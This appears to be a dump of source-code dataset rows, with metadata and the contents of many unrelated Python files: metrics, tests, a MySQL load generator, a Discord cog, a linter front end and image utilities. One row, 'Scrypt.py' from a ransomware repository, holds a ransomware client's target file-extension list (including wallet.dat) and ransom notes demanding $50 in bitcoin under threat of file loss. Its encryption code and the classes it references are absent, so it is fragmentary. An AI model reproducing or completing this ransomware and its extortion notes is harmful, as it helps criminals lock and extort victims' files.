hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
113341028baadbdf6860b5c685deb7e0ad58a04a | 186 | py | Python | utils/DiceRatio.py | jasonxingqi/3D-Unet--Tensorflow | d925d3c16d3f02c6cb9cd0e059e30f4455ff299e | [
"MIT"
] | 2 | 2019-04-30T09:09:11.000Z | 2019-05-05T01:50:15.000Z | utils/DiceRatio.py | seanbefore/3D-Unet--Tensorflow | 36a24c38041ad88d74b5d5ab09ded3c3894b00b3 | [
"MIT"
] | null | null | null | utils/DiceRatio.py | seanbefore/3D-Unet--Tensorflow | 36a24c38041ad88d74b5d5ab09ded3c3894b00b3 | [
"MIT"
] | null | null | null | import numpy as np
def dice_ratio(pred, label):
'''Note: pred & label should only contain 0 or 1.
'''
return np.sum(pred[label==1])*2.0 / (np.sum(pred) + np.sum(label)) | 26.571429 | 70 | 0.607527 |
1133ef41069d7316eeeb3a398b4c83b6ef70a38d | 8,408 | py | Python | Client/Scrypt.py | TheRedBladeClan/ScryptRansomware | 79d8eb4e0e72b74a1d37e9723667cdefd259cae4 | [
"MIT"
] | 8 | 2021-08-01T23:34:16.000Z | 2022-01-04T21:37:24.000Z | Client/Scrypt.py | TheRedBladeClan/ScryptRansomware | 79d8eb4e0e72b74a1d37e9723667cdefd259cae4 | [
"MIT"
] | null | null | null | Client/Scrypt.py | TheRedBladeClan/ScryptRansomware | 79d8eb4e0e72b74a1d37e9723667cdefd259cae4 | [
"MIT"
] | 6 | 2021-08-01T23:15:02.000Z | 2022-03-26T13:46:43.000Z | import PyQt5
import PyQt5.QtWidgets
import PyQt5.QtCore
import sys
import requests
import random
import string
import threading
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import os
import shutil
btcAdd = ""
email = ""
discordWebhook = ""
fileTypes = ['.txt','.exe','.php','.pl','.7z','.rar','.m4a','.wma','.avi','.wmv','.csv','.d3dbsp','.sc2save','.sie','.sum','.ibank','.t13','.t12','.qdf','.gdb','.tax','.pkpass','.bc6','.bc7','.bkp','.qic','.bkf','.sidn','.sidd','.mddata','.itl','.itdb','.icxs','.hvpl','.hplg','.hkdb','.mdbackup','.syncdb','.gho','.cas','.svg','.map','.wmo','.itm','.sb','.fos','.mcgame','.vdf','.ztmp','.sis','.sid','.ncf','.menu','.layout','.dmp','.blob','.esm','.001','.vtf','.dazip','.fpk','.mlx','.kf','.iwd','.vpk','.tor','.psk','.rim','.w3x','.fsh','.ntl','.arch00','.lvl','.snx','.cfr','.ff','.vpp_pc','.lrf','.m2','.mcmeta','.vfs0','.mpqge','.kdb','.db0','.mp3','.upx','.rofl','.hkx','.bar','.upk','.das','.iwi','.litemod','.asset','.forge','.ltx','.bsa','.apk','.re4','.sav','.lbf','.slm','.bik','.epk','.rgss3a','.pak','.big','.unity3d','.wotreplay','.xxx','.desc','.py','.m3u','.flv','.js','.css','.rb','.png','.jpeg','.p7c','.p7b','.p12','.pfx','.pem','.crt','.cer','.der','.x3f','.srw','.pef','.ptx','.r3d','.rw2','.rwl','.raw','.raf','.orf','.nrw','.mrwref','.mef','.erf','.kdc','.dcr','.cr2','.crw','.bay','.sr2','.srf','.arw','.3fr','.dng','.jpeg','.jpg','.cdr','.indd','.ai','.eps','.pdf','.pdd','.psd','.dbfv','.mdf','.wb2','.rtf','.wpd','.dxg','.xf','.dwg','.pst','.accdb','.mdb','.pptm','.pptx','.ppt','.xlk','.xlsb','.xlsm','.xlsx','.xls','.wps','.docm','.docx','.doc','.odb','.odc','.odm','.odp','.ods','.odt','.sql','.zip','.tar','.tar.gz','.tgz','.biz','.ocx','.html','.htm','.3gp','.srt','.cpp','.mid','.mkv','.mov','.asf','.mpeg','.vob','.mpg','.fla','.swf','.wav','.qcow2','.vdi','.vmdk','.vmx','.gpg','.aes','.ARC','.PAQ','.tar.bz2','.tbk','.bak','.djv','.djvu','.bmp','.cgm','.tif','.tiff','.NEF','.cmd','.class','.jar','.java','.asp','.brd','.sch','.dch','.dip','.vbs','.asm','.pas','.ldf','.ibd','.MYI','.MYD','.frm','.dbf','.SQLITEDB','.SQLITE3','.asc','.lay6','.lay','.ms11(Securitycopy)','.sldm','.sldx','.ppsm','.ppsx','.ppam','.docb','.mml','.sxm','.otg','.slk','.xlw','.xlt','.x
lm','.xlc','.dif','.stc','.sxc','.ots','.ods','.hwp','.dotm','.dotx','.docm','.DOT','.max','.xml','.uot','.stw','.sxw','.ott','.csr','.key','wallet.dat']
detailedNote =f"""
-------------------------------------------------------------------------------------------------------------------------
Hello,\n
If you are reading this then you have likely been hit by Scrypt Ransomware\n
We apologize for the incovience, at the end of the day we just want to get paid\n
In order to receive the decrypter you must follow the following steps to truely recover\n
all your files.\n
1. Download BitPay: https://bitpay.com/wallet/ if you are using a different wallet thats fine.\n
2. Send $50 to this address: {btcAdd}\n
3. After sending it wait for a confirmation and send us an email and include your UniqueID: {Ransomware().randomId}\n
4. Wait shortly, you will receive an email with your decrypter once everything is handled.\n
5. If we do not receive payment within 2 weeks we will no longer be handeling support.
-------------------------------------------------------------------------------------------------------------------------
"""
ransomNote = f"""
All Your Files Have Been Encrypted\n
At the end of the day we just want to get paid\n
Here are the instructions to get getting your files back\n
1. Pay $50 btc to the listed address\n
2. Send an email and include your unique id\n
3. Wait\n
------------------------------------\n
Check your desktop for readme.txt if you are lost!\n
------------------------------------\n
BTC Address: {btcAdd}\n
Email: {email}\n
UniqueID: {Ransomware().randomId}\n
------------------------------------\n
Click the Button Below To Continue:
(Killing this program will result in a full lose of files)\n
"""
if __name__ == "__main__":
app = PyQt5.QtWidgets.QApplication(sys.argv)
l = Scrypt()
sys.exit(app.exec())
| 39.28972 | 2,154 | 0.574215 |
11344bfdd8f3f077e971333f0359d4844c75765b | 611 | py | Python | tests/__init__.py | rhit-goldmate/lab-1 | 4f9f606f24c783495a246c13bde1f24a44bcf247 | [
"MIT"
] | null | null | null | tests/__init__.py | rhit-goldmate/lab-1 | 4f9f606f24c783495a246c13bde1f24a44bcf247 | [
"MIT"
] | null | null | null | tests/__init__.py | rhit-goldmate/lab-1 | 4f9f606f24c783495a246c13bde1f24a44bcf247 | [
"MIT"
] | 1 | 2021-09-13T14:47:48.000Z | 2021-09-13T14:47:48.000Z | import os
from flask import Blueprint, Flask | 35.941176 | 104 | 0.728314 |
1136bb828a12a7dcfde93227e557d6824371edd7 | 845 | py | Python | test/test_DateUtils.py | sebastianhaberey/ctax | b1da8a196560d25d5367e576cc6f659a9572bdc5 | [
"MIT"
] | 10 | 2018-12-18T21:16:47.000Z | 2022-01-17T19:53:33.000Z | test/test_DateUtils.py | sebastianhaberey/ctax | b1da8a196560d25d5367e576cc6f659a9572bdc5 | [
"MIT"
] | 19 | 2018-09-15T18:51:45.000Z | 2018-09-29T18:01:46.000Z | test/test_DateUtils.py | sebastianhaberey/ctax | b1da8a196560d25d5367e576cc6f659a9572bdc5 | [
"MIT"
] | null | null | null | from datetime import datetime
from unittest import TestCase
from dateutil.tz import UTC
from src.DateUtils import get_start_of_year, get_start_of_year_after, date_to_string, date_and_time_to_string
| 36.73913 | 109 | 0.713609 |
1137675ff4573acee0c74caca52ca34bf90e674c | 18,260 | py | Python | third-party/webscalesqlclient/mysql-5.6/mysql-test/suite/innodb_stress/t/load_generator.py | hkirsman/hhvm_centos7_builds | 2a1fd6de0d2d289c1575f43f10018f3bec23bb13 | [
"PHP-3.01",
"Zend-2.0"
] | null | null | null | third-party/webscalesqlclient/mysql-5.6/mysql-test/suite/innodb_stress/t/load_generator.py | hkirsman/hhvm_centos7_builds | 2a1fd6de0d2d289c1575f43f10018f3bec23bb13 | [
"PHP-3.01",
"Zend-2.0"
] | null | null | null | third-party/webscalesqlclient/mysql-5.6/mysql-test/suite/innodb_stress/t/load_generator.py | hkirsman/hhvm_centos7_builds | 2a1fd6de0d2d289c1575f43f10018f3bec23bb13 | [
"PHP-3.01",
"Zend-2.0"
] | null | null | null | import cStringIO
import hashlib
import MySQLdb
import os
import random
import signal
import sys
import threading
import time
import string
import traceback
CHARS = string.letters + string.digits
# Should be deterministic given an idx
# Base class for worker threads
def populate_table(con, num_records_before, do_blob, log, document_table):
con.autocommit(False)
cur = con.cursor()
stmt = None
workers = []
N = num_records_before / 10
start_id = 0
for i in xrange(10):
w = PopulateWorker(MySQLdb.connect(user=user, host=host, port=port, db=db),
start_id, start_id + N, i, document_table)
start_id += N
workers.append(w)
for i in xrange(start_id, num_records_before):
msg = get_msg(do_blob, i)
# print >> log, "length is %d, complen is %d" % (len(msg), len(zlib.compress(msg, 6)))
stmt = get_insert(msg, i+1, document_table)
cur.execute(stmt)
con.commit()
for w in workers:
w.join()
if w.exception:
print >>log, "populater thead %d threw an exception" % w.num
return False
return True
def get_update(msg, idx, document_table):
if document_table:
return """
UPDATE t1 SET doc = '{"msg_prefix" : "%s", "msg" : "%s", "msg_length" : %d,
"msg_checksum" : "%s"}' WHERE id=%d""" % (msg[0:255], msg, len(msg), sha1(msg), idx)
else:
return """
UPDATE t1 SET msg_prefix='%s',msg='%s',msg_length=%d,
msg_checksum='%s' WHERE id=%d """ % (msg[0:255], msg, len(msg), sha1(msg), idx)
def get_insert_on_dup(msg, idx, document_table):
if document_table:
return """
INSERT INTO t1 (id, doc) VALUES
(%d, '{"msg_prefix" : "%s", "msg": "%s", "msg_length" : %d,
"msg_checksum" : "%s"}')
ON DUPLICATE KEY UPDATE
id=VALUES(id),
doc=VALUES(doc)
""" % (idx, msg[0:255], msg, len(msg), sha1(msg))
else:
return """
INSERT INTO t1 (msg_prefix,msg,msg_length,msg_checksum,id)
VALUES ('%s','%s',%d,'%s',%d)
ON DUPLICATE KEY UPDATE
msg_prefix=VALUES(msg_prefix),
msg=VALUES(msg),
msg_length=VALUES(msg_length),
msg_checksum=VALUES(msg_checksum),
id=VALUES(id)""" % (msg[0:255], msg, len(msg), sha1(msg), idx)
def get_insert(msg, idx, document_table):
if document_table:
return """
INSERT INTO t1 (id, doc) VALUES
(%d, '{"msg_prefix" : "%s", "msg": "%s", "msg_length" : %d,
"msg_checksum" : "%s"}')
""" % (idx, msg[0:255], msg, len(msg), sha1(msg))
else:
return """
INSERT INTO t1(id,msg_prefix,msg,msg_length,msg_checksum)
VALUES (%d,'%s','%s',%d,'%s')
""" % (idx, msg[0:255], msg, len(msg), sha1(msg))
def get_insert_null(msg, document_table):
if document_table:
return """
INSERT INTO t1 (id, doc) VALUES
(NULL, '{"msg_prefix" : "%s", "msg": "%s", "msg_length" : %d,
"msg_checksum" : "%s"}')
""" % (msg[0:255], msg, len(msg), sha1(msg))
else:
return """
INSERT INTO t1 (msg_prefix,msg,msg_length,msg_checksum,id) VALUES
('%s','%s',%d,'%s',NULL)
""" % (msg[0:255], msg, len(msg), sha1(msg))
if __name__ == '__main__':
global LG_TMP_DIR
pid_file = sys.argv[1]
kill_db_after = int(sys.argv[2])
num_records_before = int(sys.argv[3])
num_workers = int(sys.argv[4])
num_xactions_per_worker = int(sys.argv[5])
user = sys.argv[6]
host = sys.argv[7]
port = int(sys.argv[8])
db = sys.argv[9]
do_blob = int(sys.argv[10])
max_id = int(sys.argv[11])
LG_TMP_DIR = sys.argv[12]
fake_changes = int(sys.argv[13])
checksum = int(sys.argv[14])
secondary_checks = int(sys.argv[15])
no_defrag = int(sys.argv[16])
document_table = int(sys.argv[17])
checksum_worker = None
defrag_worker = None
workers = []
server_pid = int(open(pid_file).read())
log = open('/%s/main.log' % LG_TMP_DIR, 'a')
# print "kill_db_after = ",kill_db_after," num_records_before = ", \
#num_records_before, " num_workers= ",num_workers, "num_xactions_per_worker =",\
#num_xactions_per_worker, "user = ",user, "host =", host,"port = ",port,\
#" db = ", db, " server_pid = ", server_pid
if num_records_before:
print >> log, "populate table do_blob is %d" % do_blob
con = None
retry = 3
while not con and retry > 0:
con = MySQLdb.connect(user=user, host=host, port=port, db=db)
retry = retry - 1
if not con:
print >> log, "Cannot connect to MySQL after 3 attempts."
sys.exit(1)
if not populate_table(con, num_records_before, do_blob, log,
document_table):
sys.exit(1)
con.close()
if checksum:
print >> log, "start the checksum thread"
con = MySQLdb.connect(user=user, host=host, port=port, db=db)
if not con:
print >> log, "Cannot connect to MySQL server"
sys.exit(1)
checksum_worker = ChecksumWorker(con, checksum)
workers.append(checksum_worker)
print >> log, "start %d threads" % num_workers
for i in xrange(num_workers):
worker = Worker(num_xactions_per_worker, i,
MySQLdb.connect(user=user, host=host, port=port, db=db),
server_pid, do_blob, max_id, fake_changes, secondary_checks,
document_table)
workers.append(worker)
if no_defrag == 0:
defrag_worker = DefragmentWorker(MySQLdb.connect(user=user, host=host,
port=port, db=db))
if kill_db_after:
print >> log, "kill mysqld"
time.sleep(kill_db_after)
os.kill(server_pid, signal.SIGKILL)
worker_failed = False
print >> log, "wait for threads"
for w in workers:
w.join()
if w.exception:
print "Worker hit an exception:\n%s\n" % w.exception
worker_failed = True
if defrag_worker:
defrag_worker.stop()
defrag_worker.join()
if defrag_worker.exception:
print ("Defrag worker hit an exception:\n%s\n." %
defrag_worker.exception)
worker_failed = True
if checksum_worker:
checksum_worker.join()
if checksum_worker.exception:
print ("Checksum worker hit an exception:\n%s\n." %
checksum_worker.exception)
worker_failed = True
if worker_failed:
sys.exit(1)
print >> log, "all threads done"
| 34.130841 | 115 | 0.600657 |
11389b7061e65d0958fbebfba4739239a2fc1bea | 2,037 | py | Python | sancus/lib/cogs/owner/admin_slash.py | Solar-Productions/sancus | eb3c5c702bc5574c62b488c0e3bb06a36159e651 | [
"Apache-2.0"
] | 1 | 2021-09-03T22:52:27.000Z | 2021-09-03T22:52:27.000Z | sancus/lib/cogs/owner/admin_slash.py | LunarDevelop/sancus | eb3c5c702bc5574c62b488c0e3bb06a36159e651 | [
"Apache-2.0"
] | 1 | 2021-10-10T22:11:51.000Z | 2021-10-10T22:11:51.000Z | sancus/lib/cogs/owner/admin_slash.py | Solar-Productions/sancus | eb3c5c702bc5574c62b488c0e3bb06a36159e651 | [
"Apache-2.0"
] | 1 | 2021-11-11T16:04:02.000Z | 2021-11-11T16:04:02.000Z | from configparser import ConfigParser
from glob import glob
from discord import Embed
from discord.ext.commands import Cog, command, group, is_owner
import asyncio
import datetime
import sys
import discord
from discord.ext.commands.context import Context
#from tinker.ext.apps import *
| 37.036364 | 93 | 0.701522 |
113a13cfc94224ffc2876a0d52f150f295d86f1c | 20,820 | py | Python | jscodestyle/main.py | zeth/jscodestyle | 43c98de7b544bf2203b23792677a7cefb5daf1d9 | [
"Apache-2.0"
] | null | null | null | jscodestyle/main.py | zeth/jscodestyle | 43c98de7b544bf2203b23792677a7cefb5daf1d9 | [
"Apache-2.0"
] | null | null | null | jscodestyle/main.py | zeth/jscodestyle | 43c98de7b544bf2203b23792677a7cefb5daf1d9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2018 The JsCodeStyle Authors.
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Checks JavaScript files for common style guide violations.
gjslint.py is designed to be used as a PRESUBMIT script to check for javascript
style guide violations. As of now, it checks for the following violations:
* Missing and extra spaces
* Lines longer than 80 characters
* Missing newline at end of file
* Missing semicolon after function declaration
* Valid JsDoc including parameter matching
Someday it will validate to the best of its ability against the entirety of the
JavaScript style guide.
This file is a front end that parses arguments and flags. The core of the code
is in tokenizer.py and checker.py.
"""
from __future__ import print_function
import argparse
import sys
import time
import os
import glob
import re
import multiprocessing
import errno
from itertools import tee
from functools import partial
from jscodestyle.errorrecord import check_path, fix_path
from jscodestyle.error_check import STRICT_DOC, JSLINT_ERROR_DOC
from jscodestyle.error_fixer import ErrorFixer
GJSLINT_ONLY_FLAGS = ['--unix_mode', '--beep', '--nobeep', '--time',
'--check_html', '--summary', '--quiet']
# Comment - Below are all the arguments from gjslint. There are way
# too many, we should think what is really useful and cull some.
# Perhaps we should rely more on a config file for advance setups
def fix():
"""Automatically fix simple style guide violations."""
style_checker = JsCodeStyle()
style_checker.fix()
def main():
"""Used when called as a command line script."""
style_checker = JsCodeStyle()
style_checker.check()
if __name__ == '__main__':
main()
| 33.365385 | 89 | 0.579443 |
113bd9cbcd07a3d262fa13c56a09b92b81be3c27 | 326 | py | Python | leetcode/code/reverseString.py | exchris/Pythonlearn | 174f38a86cf1c85d6fc099005aab3568e7549cd0 | [
"MIT"
] | null | null | null | leetcode/code/reverseString.py | exchris/Pythonlearn | 174f38a86cf1c85d6fc099005aab3568e7549cd0 | [
"MIT"
] | 1 | 2018-11-27T09:58:54.000Z | 2018-11-27T09:58:54.000Z | leetcode/code/reverseString.py | exchris/pythonlearn | 174f38a86cf1c85d6fc099005aab3568e7549cd0 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding:utf-8 -*-
'''
1:
: "hello"
: "olleh"
2:
: "A man, a plan, a canal: Panama"
: "amanaP :lanac a ,nalp a ,nam A"
'''
| 13.583333 | 36 | 0.518405 |
113d668d246018125fb65ca3ee23f8d2a4812ab3 | 343 | py | Python | tracker/admin.py | OscarGichana/tracker | c980f0e348804ae6a2501c09096df1af51b0bba6 | [
"Unlicense"
] | null | null | null | tracker/admin.py | OscarGichana/tracker | c980f0e348804ae6a2501c09096df1af51b0bba6 | [
"Unlicense"
] | null | null | null | tracker/admin.py | OscarGichana/tracker | c980f0e348804ae6a2501c09096df1af51b0bba6 | [
"Unlicense"
] | null | null | null | from django.contrib import admin
from .models import Profile,Neighborhood,Posts,Business
# Register your models here.
admin.site.register(Profile)
admin.site.register(Neighborhood)
admin.site.register(Posts)
admin.site.register(Business)
# admin.site.register(DisLike)
# admin.site.register(MoringaMerch)
# admin.site.register(AwardsProject)
| 28.583333 | 55 | 0.819242 |
113f460e7a9bae8c1f88a8e62410ca63e38c1751 | 62,843 | py | Python | pyls/extra/mclass.py | nemethf/bess-language-server | 25768bfabd3b2f194c14c383e13c96a2c35ab096 | [
"MIT"
] | null | null | null | pyls/extra/mclass.py | nemethf/bess-language-server | 25768bfabd3b2f194c14c383e13c96a2c35ab096 | [
"MIT"
] | null | null | null | pyls/extra/mclass.py | nemethf/bess-language-server | 25768bfabd3b2f194c14c383e13c96a2c35ab096 | [
"MIT"
] | null | null | null | # This file is auto-genereated by bess-gen-doc.
# See https://github.com/nemethf/bess-gen-doc
#
# It is based on bess/protobuf/module_msg.proto, which has the following copyright.
# Copyright (c) 2016-2017, Nefeli Networks, Inc.
# Copyright (c) 2017, The Regents of the University of California.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the names of the copyright holders nor the names of their
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from pybess.module import Module
from pybess.bess import BESS
bess = BESS()
| 32.095506 | 260 | 0.70926 |
1140bf2a91589655a2b5c15a7d3b4ca12c6d5027 | 409 | py | Python | posts/migrations/0010_auto_20201120_0529.py | vldslv/simple-blog | 85ea180e92a3a584e3b4ae2d97a5224c559a7cc1 | [
"BSD-3-Clause"
] | null | null | null | posts/migrations/0010_auto_20201120_0529.py | vldslv/simple-blog | 85ea180e92a3a584e3b4ae2d97a5224c559a7cc1 | [
"BSD-3-Clause"
] | null | null | null | posts/migrations/0010_auto_20201120_0529.py | vldslv/simple-blog | 85ea180e92a3a584e3b4ae2d97a5224c559a7cc1 | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.2.9 on 2020-11-20 02:29
from django.db import migrations, models
| 22.722222 | 99 | 0.630807 |
1140d660290898ce8ff771db41de2f9db2a0fbed | 350 | py | Python | tests/test_helpers.py | jlmcgehee21/disterminal | 0517483960459d81f2f7361e53c91bd12c12130b | [
"MIT"
] | 10 | 2018-03-25T19:14:21.000Z | 2018-05-20T04:04:27.000Z | tests/test_helpers.py | jlmcgehee21/disterminal | 0517483960459d81f2f7361e53c91bd12c12130b | [
"MIT"
] | 1 | 2018-04-06T17:33:45.000Z | 2018-04-06T17:33:45.000Z | tests/test_helpers.py | jlmcgehee21/disterminal | 0517483960459d81f2f7361e53c91bd12c12130b | [
"MIT"
] | null | null | null | import pytest
from disterminal import helpers
import numpy as np
| 17.5 | 45 | 0.625714 |
114113c2327e984853bcfe3d2bdb8fbe4a9538bc | 4,149 | py | Python | tests/test_lookups.py | gluk-w/python-tuple-lookup | b0c44bb8fb9c94925c97b54b02ffc8abeb570914 | [
"MIT"
] | null | null | null | tests/test_lookups.py | gluk-w/python-tuple-lookup | b0c44bb8fb9c94925c97b54b02ffc8abeb570914 | [
"MIT"
] | null | null | null | tests/test_lookups.py | gluk-w/python-tuple-lookup | b0c44bb8fb9c94925c97b54b02ffc8abeb570914 | [
"MIT"
] | null | null | null | import pytest
from listlookup import ListLookup
sample_list = [
{"id": 1, "country": "us", "name": "Atlanta"},
{"id": 2, "country": "us", "name": "Miami"},
{"id": 3, "country": "uk", "name": "Britain"},
{"id": 5, "country": "uk", "name": "Bermingham"},
{"id": 4, "country": "ca", "name": "Barrie"},
]
def test_lookup_does_not_modify_indexes():
"""
There was a bug that modified index after lookup
"""
cities = ListLookup(sample_list)
cities.index("country", lambda d: d['country'])
cities.index("name", lambda d: d['name'])
result = list(cities.lookup(country='us', name='Miami'))
assert len(result) == 1
second_res = list(cities.lookup(country='us', name='Atlanta'))
assert len(second_res) == 1
| 31.195489 | 114 | 0.614124 |
1143cbb13d91eca82341ad8a60ceba57b21e31ee | 13,697 | py | Python | ImagePipeline_utils.py | titsitits/image-restoration | 7434917c8e14c9c78cd1a9aa06ff1a058368543b | [
"Apache-2.0"
] | 18 | 2019-07-24T15:58:11.000Z | 2022-02-16T04:14:15.000Z | ImagePipeline_utils.py | titsitits/image-restoration | 7434917c8e14c9c78cd1a9aa06ff1a058368543b | [
"Apache-2.0"
] | 2 | 2020-09-15T10:26:31.000Z | 2021-02-23T16:52:50.000Z | ImagePipeline_utils.py | titsitits/image-restoration | 7434917c8e14c9c78cd1a9aa06ff1a058368543b | [
"Apache-2.0"
] | 7 | 2019-10-01T07:28:58.000Z | 2022-01-08T12:45:01.000Z | import time
import numpy as np
import os, sys, shutil
from contextlib import contextmanager
from numba import cuda as ncuda
import PIL
from PIL import Image, ImageFilter, ImageDraw, ImageFont
import cv2
import contextlib
from copy import deepcopy
import subprocess
from glob import glob
from os import path as osp
from os import path
utilspath = os.path.join(os.getcwd(), 'utils/')
def duplicatedir(src,dst):
if not os.path.exists(src):
print('ImagePipeline_utils. duplicatedir: Source directory does not exists!')
return
if src != dst:
if os.path.exists(dst):
shutil.rmtree(dst)
shutil.copytree(src=src,dst=dst)
import os, time, datetime
#import PIL.Image as Image
import numpy as np
from skimage.measure import compare_psnr, compare_ssim
from skimage.io import imread, imsave
fontfile = os.path.join(utilspath,"arial.ttf")
utilspath = os.path.join(os.getcwd(), 'utils/')
fontfile = os.path.join(utilspath,"arial.ttf")
def concat_images(img_list, labels = [], imagetype = None, sameheight = True, imagewidth = None, imageheight = None, labelsize = 30, labelpos = (10,10), labelcolor = None):
"""
imagetype: allow to convert all images to a PIL.Image.mode (L = grayscale, RGB, RGBA, ...)
sameheight: put all images to same height (size of smallest image of the list, or imageheight if not None)
imageheight: if not None, force all images to have this height (keep aspect ratio). Force sameheight to True
imagewidth: if not None, force all images to have this width (keep aspect ratio if sameheight=False and imageheight=None)
"""
images = deepcopy(img_list)
if imagetype == None:
imagetype = 'RGB'
images = [im.convert(imagetype) for im in images]
#force all image to imageheight (keep aspect ratio)
if imageheight is not None:
sameheight = True
widths, heights = zip(*(i.size for i in images))
#resize needed ?
if ( (len(set(heights)) > 1) & sameheight ) or (imageheight is not None) or (imagewidth is not None):
if imageheight is None:
imageheight = min(heights)
#force all images to same width
if imagewidth is not None:
if sameheight: #force width and height
images = [im.resize( (int(imagewidth),int(imageheight)),PIL.Image.ANTIALIAS ) for im in images]
else: #force width (keep aspect ratio)
images = [im.resize( (int(imagewidth),int(im.height*imagewidth/im.width)),PIL.Image.ANTIALIAS ) for im in images]
else: #force height (keep aspect ratio)
images = [im.resize( (int(im.width*imageheight/im.height), imageheight) ,PIL.Image.ANTIALIAS) for im in images]
widths, heights = zip(*(i.size for i in images))
total_width = sum(widths)
max_height = max(heights)
new_im = PIL.Image.new(imagetype, (total_width, max_height))
#add labels to images
if len(labels) == len(images):
fnt = ImageFont.truetype(fontfile, labelsize)
if imagetype == 'L':
fill = 240
elif imagetype == 'RGB':
fill = (176,196,222)
elif imagetype == 'RGBA':
fill = (176,196,222,0)
if labelcolor is not None:
fill = labelcolor
for i in range(len(labels)):
d = ImageDraw.Draw(images[i]).text(labelpos, labels[i], font = fnt, fill = fill)
x_offset = 0
for im in images:
new_im.paste(im, (x_offset,0))
x_offset += im.size[0]
return new_im
def clone_git(url, dir_name = None, tag = None, reclone = False):
"""
url: url of the git repository to clone
dir_name: name of the folder to give to the repository. If not given, the git repository name is used
tag: allows to checkout a specific commit if given
reclone: overwrite existing repo
"""
old_dir = os.getcwd()
if dir_name is None:
dir_name = os.path.split(url)[1] #use git repo name
dir_name = os.path.splitext(dir_name)[0] #remove ".git" if present
if reclone and os.path.exists(dir_name):
shutil.rmtree(dir_name)
if not os.path.exists(dir_name):
command = "git clone %s %s" % (url, dir_name)
subprocess.run(command, shell = True)
os.chdir(dir_name)
if tag is not None:
command = "git checkout %s" % tag
subprocess.run(command, shell = True)
git_path = os.path.join(os.getcwd())
os.chdir(old_dir)
return git_path
| 24.768535 | 172 | 0.678032 |
1144dfe3b0de92ac50325fd69bcff937bffb9527 | 371 | py | Python | py_tea_code/2.mypro_io/test_os/my05.py | qq4215279/study_python | b0eb9dedfc4abb2fd6c024a599e7375869c3d77a | [
"Apache-2.0"
] | null | null | null | py_tea_code/2.mypro_io/test_os/my05.py | qq4215279/study_python | b0eb9dedfc4abb2fd6c024a599e7375869c3d77a | [
"Apache-2.0"
] | null | null | null | py_tea_code/2.mypro_io/test_os/my05.py | qq4215279/study_python | b0eb9dedfc4abb2fd6c024a599e7375869c3d77a | [
"Apache-2.0"
] | null | null | null | #coding=utf-8
#os.walk()
import os
all_files = []
path = os.getcwd()
list_files = os.walk(path)
for dirpath,dirnames,filenames in list_files:
for dir in dirnames:
all_files.append(os.path.join(dirpath,dir))
for file in filenames:
all_files.append(os.path.join(dirpath,file))
#
for file in all_files:
print(file) | 20.611111 | 52 | 0.71159 |
1144ebed87008c80403fadd34329c7f64e53da5b | 2,801 | py | Python | lib_drl/layer_utils/proposal_layer.py | chang010453/GRP-HAI | 60f7c7633e33dbdd852f5df3e0a3d1017b6b2a22 | [
"MIT"
] | null | null | null | lib_drl/layer_utils/proposal_layer.py | chang010453/GRP-HAI | 60f7c7633e33dbdd852f5df3e0a3d1017b6b2a22 | [
"MIT"
